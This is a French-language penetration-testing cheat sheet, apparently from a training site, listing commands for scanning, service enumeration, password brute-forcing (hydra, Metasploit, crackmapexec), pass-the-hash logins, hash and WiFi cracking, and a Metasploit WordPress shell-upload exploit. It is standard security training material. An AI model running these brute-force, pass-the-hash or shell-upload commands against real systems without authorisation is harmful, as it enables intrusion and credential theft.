La boîte à outils - No Hack Me Academy

Scanning

ARP

netdiscover -i $INTERFACE

netdiscover -i $INTERFACE -r $RANGE

netdiscover -i $INTERFACE -p

nmap -sn $RANGE

NetBIOS

nbtscan -r $RANGE

Port scanning

nmap -A $TARGET

nmap -p- $TARGET

nmap $TARGET

nmap -F $TARGET

nmap -v -Pn -p0-65535 -T4 $TARGET

nmap -Pn -sC -sV -p "20-25,53,80,135,139,443,445" $TARGET

nmap -Pn --script vuln -sV -p "20-25,53,80,135,139,443,445" $TARGET

nmap -sU -sV --top-ports 20 $TARGET

masscan -e $INTERFACE -p0-65535,U:0-65535 --max-rate 100000 $TARGETS

Enumération

nikto -h http://$IP

FTP (port 21)

telnet -vn $IP $PORT

nmap -sS -sV -p21 $IP

ftp $IP
> anonymous
> anonymous

$ msfconsole
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS $IP
msf auxiliary(anonymous) > set THREADS 55
msf auxiliary(anonymous) > run

crackmapexec ftp $ip[/24] -u anonymous -p anonymous

SSH (port 22)

ssh $username@$IP

ssh -i key.txt $username@$IP

ssh $username@$IP -t "bash --noprofile"

ssh -v $IP

nc -vn $IP 22

ssh-keyscan -t rsa $IP -p $PORT

nmap -sV -p22 $IP

nmap -p22 -n -sV --script ssh2-enum-algos $IP

Telnet (port 23)

nmap -sV -p23 $IP

telnet $IP $PORT

SMTP (port 25-587)

nmap -p25 --script smtp-commands $IP

nmap --script smtp-enum-users $IP

swaks --to $destinataire --server $serveur_SMTP

$ msfconsole
msf > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set RHOSTS $IP
msf auxiliary(smtp_enum) > run

DNS (port 53)

nmap -v -sV -p 53 $SUBNET/$MASK

nmap -v -sV -sU -p 53 $SUBNET/$MASK

dig +short ns $domaine

dnsenum $domaine

nslookup -type=ptr $IP_address

dnsrecon -r $RANGE -n $DC_IP

nmap --script dns-srv-enum --script-args dns-srv-enum.domain=$FQDN_DOMAIN

SNMP (port 161-162)

$ msfconsole
msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) > set RHOSTS $IP
msf auxiliary(snmp_enum) > run

$ msfconsole
msf > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(snmp_enumshares) > set RHOSTS $IP
msf auxiliary(snmp_enumshares) > set THREADS 11
msf auxiliary(snmp_enumshares) > run

$ msfconsole
msf > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumshares) > set RHOSTS $IP
msf auxiliary(snmp_enumshares) > set THREADS 11
msf auxiliary(snmp_enumshares) > run

SMB (port 445-139)

nmap -sS -sV -p445-139 $IP

nmap -p139-445 --script=smb-vuln* $IP

smbclient --list //$IP

smbmap -H $IP

smbclient --no-pass --list //$IP

smbclient --user ''%'' --list //$IP

smbmap -u '' -p '' -H $IP

smbclient //$IP/$SHARE_NAME

crackmapexec smb $TARGETS -u '' -p '' --shares

crackmapexec smb $IP -u '$username' -p '$password' --shares

crackmapexec smb $IP -u '$username' -H '$hash' --shares

crackmapexec smb $IP -u '$username' -p '$password' --spider C$ --pattern txt

mount -t cifs //$IP/$Fichier /mnt/partage

mount -t cifs -o "username=$username,password=$password" //$IP/$Fichier /mnt/partage

RDP (port 3389)

nmap -A -p3389 $IP

rdesktop -u $username $IP

rdesktop -d $domain -u $username -p $password $IP

xfreerdp /u:[domain\]$username /p:$password /v:$IP

xfreerdp /u:[domain\]$username /pth:$hash /v:$IP

crackmapexec rdp $IP --nla-screenshot

MySQL (port 3306)

nmap -sV -p3306 $IP

mysql -h $IP -u $username -p

Web Application Firewall (WAF)

wafw00f $URL

whatwaf -u $URL

nmap -p $PORT --script=http-waf-fingerprint,http-waf-detect $URL

John The Ripper

john hash

zip2john file.zip > pass.hash

john --wordlist=/usr/share/wordlists/rockyou.txt pass.hash

Directory Bruteforce

dirb http://$IP/

dirb http://$IP/ -X .txt

dirb http://$IP/ /usr/share/wordlists/dirb/big.txt

gobuster dir -u http://$IP[:$PORT] -w /usr/share/wordlists/dirb/big.txt

gobuster vhost -u $domain -w /usr/share/wordlists/dirb/big.txt | grep 200

Bruteforce

cewl http://$IP/ -w dict.txt

FTP (port 21)

nmap --script ftp-* -p21 $IP

hydra -l $user -s 21 -P $path_pass_list $IP -t 4 ftp

hydra -L usernames.txt -P passwords.txt $IP ftp

SSH (port 22)

hydra -l $user -s 22 -P $path_pass_list $IP -t 4 ssh

Telnet (port 23)

$ msfconsole
msf > use auxiliary/scanner/telnet/telnet_login
msf auxiliary(scanner/telnet/telnet_login) > set rhosts $IP
msf auxiliary(scanner/telnet/telnet_login) > set user_file user.txt
msf auxiliary(scanner/telnet/telnet_login) > set pass_file pass.txt
msf auxiliary(scanner/telnet/telnet_login) > set stop_on_success true
msf auxiliary(scanner/telnet/telnet_login) > exploit

SNMP (port 161-162)

$ msfconsole
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_enumshares) > set RHOSTS $IP
msf auxiliary(snmp_enumshares) > set THREADS 200 #par exemple
msf auxiliary(snmp_enumshares) > run

SMB (port 445-139)

hydra -L usernames.txt -P passwords.txt $IP -V -f smb

nmap --script smb-brute -p 445 $IP

crackmapexec smb $IP/24 -u user.txt -p pass.txt

RDP (port 3389)

hydra -L user.txt -P pass.txt $IP rdp

MySQL (port 3306)

$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > set rhosts $IP
msf auxiliary(scanner/mysql/mysql_login) > set user_file user.txt
msf auxiliary(scanner/mysql/mysql_login) > set pass_file pass.txt
msf auxiliary(scanner/mysql/mysql_login) > exploit

nmap -p3306 --script=mysql-brute --script-args userdb=user.txt, passdb=pass.txt $IP

Encoding / Decoding

echo '' | base64 -d

Exploitation

aircrack-ng -w /usr/share/wordlists/rockyou.txt file.cap

Shell amélioré

python -c 'import pty;pty.spawn("/bin/bash")'

Python Web Server

python -m SimpleHTTPServer

CMS

wpscan --url http://$IP/$wordpress_path/ --enumerate

wpscan --url http://$IP/$wordpress_path/ -U usr -P /usr/share/wordlists/rockyou.txt

joomscan $IP

joomscan -u http://$IP/joomla

$ msfconsole
msf > use exploit/unix/webapp/wp_admin_shell_upload msf exploit(unix/webapp/wp_admin_shell_upload) > set rhosts $IP msf exploit(unix/webapp/wp_admin_shell_upload) > set username admin msf exploit(unix/webapp/wp_admin_shell_upload) > set password Password@123 msf exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /$wordpress_path/ msf exploit(unix/webapp/wp_admin_shell_upload) > exploit